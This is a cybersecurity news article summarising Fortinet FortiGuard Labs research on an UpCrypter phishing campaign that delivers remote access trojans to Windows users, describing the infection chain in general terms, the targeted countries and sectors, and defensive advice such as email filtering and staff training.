A widespread phishing campaign leveraging the UpCrypter malware is targeting Windows users globally, with the goal of establishing long-term remote access to compromised systems. Cybersecurity researchers at Fortinet’s FortiGuard Labs have been tracking the surge in these attacks since early August 2025.
The attack vector involves phishing emails disguised as missed voicemails or purchase orders. These emails redirect victims to convincing fake websites that prompt them to download a ZIP file. This ZIP archive contains a heavily obfuscated JavaScript dropper.
According to Cara Lin, a Fortinet FortiGuard Labs researcher, these malicious pages are designed to lure recipients into downloading seemingly harmless JavaScript files. Once executed, the JavaScript triggers PowerShell commands in the background, establishing a connection with attacker-controlled servers to download the next stage of the malware.
The UpCrypter loader then scans the compromised system for sandbox environments or forensic tools. If detected, UpCrypter will force a reboot to disrupt analysis. If no such obstacles are present, UpCrypter downloads and executes further payloads, sometimes concealing these files within images using steganography to evade antivirus detection.
The final stage of the attack involves deploying remote access tools (RATs), including PureHVNC, DCRat (DarkCrystal RAT), and Babylon RAT. PureHVNC allows for hidden remote desktop access, while DCRat provides a multifunction tool for spying and data theft. Babylon RAT enables attackers to gain complete control over the infected device.
Fortinet researchers have observed that the attackers employ various techniques to conceal their malicious code. These include string obfuscation, modification of registry settings for persistence, and in-memory code execution to minimize traces on the disk.
The phishing campaign has demonstrated international reach, with significant activity detected in Austria, Belarus, Canada, Egypt, India, and Pakistan. The sectors most heavily targeted include manufacturing, technology, healthcare, construction, and retail/hospitality. Detections of the UpCrypter malware have doubled in a mere two weeks, highlighting the rapid expansion of this campaign.
This attack is not simply about stealing credentials; it aims to deploy a chain of malware designed to remain hidden within corporate systems for an extended period, granting attackers persistent access. Fortinet advises users and organizations to take this threat seriously by implementing strong email filters and providing staff training to recognize and avoid these types of phishing attacks.
